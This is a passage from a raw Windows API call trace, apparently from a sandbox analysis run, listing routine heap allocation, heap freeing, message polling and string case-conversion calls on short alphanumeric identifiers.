Size=0x10) returned 0x24a9f78 [0262.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.983] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.983] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.983] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.983] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.984] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.984] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.984] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.984] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.984] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.984] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.984] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.984] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.985] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.986] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.988] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.988] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.988] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.989] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.989] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.989] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.989] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.990] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.990] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.990] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.990] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0262.993] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.993] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.993] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.993] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.993] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.994] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.994] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 